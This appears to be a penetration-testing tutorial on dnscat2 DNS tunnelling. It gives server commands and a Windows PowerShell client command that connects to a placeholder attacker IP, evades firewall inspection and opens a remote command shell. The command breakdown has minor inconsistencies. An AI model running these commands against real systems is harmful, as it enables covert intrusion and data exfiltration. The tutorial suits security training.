Dnscat2

Dnscat2 works when a local DNS server tries to resolve an address to perform DNS Tunnelling.

Data is exfiltrated and sent over the network instead of a legitimate DNS request. Dnscat2 can be extremely stealthy to exfiltrate data while evading firewall detections which strips the HTTPS connections and inspects it.

To install dnscat2 on Kali, we can use the apt install dnscat2 command.

Once installed, we can use the following commands to start the server.

dnscat2-server <domain>
dnscat2-server host=<Attacker IP>,port=<port>,domain=<domain>

Command breakdown:

• --dns <Attacker IP> - Specify the IP address of the DNS server.
• port=,port> - Specify the port to listen on.
• domain=<domain> - Specify the target domain.

After running the server, we are provided a secret key which will be required on the client so that it can authenticate and encrypt data sent to the external dnscat2 server. An example will be using Dnscat2 on a Windows target using the PowerShell version.

https://github.com/lukebaggett/dnscat2-powershell

Once downloaded, we can use the following PowerShell command to import the module.

Import-Module .\dnscat2.ps1

Once imported, we can use the following command to start the client.

Start-Dnscat2 -DNSserver <Attacker IP> -Domain <domain> -PreSharedSecret <secret key> -Exec cmd

Command breakdown:

• -DNSserver <Attacker IP> - Specify the IP address of the DNS server.
• -Domain <domain> - Specify the target domain.
• -PreSharedSecret <secret key> - Specify the secret provided when starting the server.
• -Exec cmd - Execute command prompt upon establishing the tunnel.

Alternatively, we can use the provided commands upon starting the server.

After executing the command on the client, we can use the question mark (?) to list commands that we can use. An example will be using window -i 1 to interact with the shell started.